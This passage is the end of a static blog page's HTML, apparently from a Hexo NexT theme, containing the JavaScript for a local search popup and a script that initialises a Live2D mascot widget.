            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"model":{"jsonPath":"/live2dw/assets/wanko.model.json"},"display":{"position":"left","width":300,"height":600},"mobile":{"show":false},"log":false});</script></body>
</html>
